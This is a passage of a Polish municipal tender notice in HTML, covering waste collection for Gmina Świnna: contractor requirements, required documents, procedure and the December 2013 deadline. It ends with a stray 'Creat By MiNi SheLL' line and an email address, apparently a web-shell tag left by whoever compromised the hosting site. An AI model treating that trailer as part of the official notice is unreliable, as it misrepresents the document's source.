<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy posiadają  wiedzę i doświadczenie, tj.  Wykonawca musi  wykazać, że   w  okresie    ostatnich  trzech  lat przed upływem terminu składania ofert , a  jeżeli okres prowadzenia  
      działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną usługę   lub usługi polegające  na odbiorze  i zagospodarowaniu odpadów komunalnych w  ilości łącznej, co najmniej  1600 Mg od co najmniej  2 000 nieruchomości (zgodnie z  załącznikiem Nr 6  do niniejszej specyfikacji) .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać sie mogą Wykonawcy, którzy dysponują  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. 
   - co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, 
   - co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów   komunalnych,
   - co najmniej jeden samochód do jazdy w trudnym terenie, z napędem na dwie osie lub  ciągnik z  odpowiednią przyczepą .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony  formularz   ofertowy   stanowiący    kartę   tytułową    oferty,   dostarczony     Wykonawcom wraz ze  Specyfikacją  Istotnych Warunków Zamówienia (Załącznik Nr 1),
b) Wykaz osób uprawnionych do podpisywania  dokumentów przetargowych i   
    podejmowania zobowiązań w imieniu Wykonawcy, oraz pełnomocnictwa udzielane 
    osobom podpisującym dokumenty ofertowe, o ile prawo do  reprezentowania Wykonawcy  w  powyższym zakresie    nie wynika wprost z dokumentu rejestrowego. 
c) Pełnomocnictwo udzielone reprezentantowi wykonawców ubiegających się o udzielenie zamówienia publicznego wspólnie.
d) dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych dopuszcza   zmiany postanowień umowy w następujących przypadkach:
-  zmiany przepisów prawa   podatkowego - tj. zmiany stawki podatku VAT. 
    Wprowadzenie zmian wymaga sporządzenia protokołu konieczności określającego 
    podstawy faktyczne i prawne nowych przepisów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.swinna.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Świnnej  ul. Wspólna 13 34-331 Świnna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 09:30, miejsce: Urząd Gminy w Świnnej  ul. Wspólna 13 34-331 Świnna pok. Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com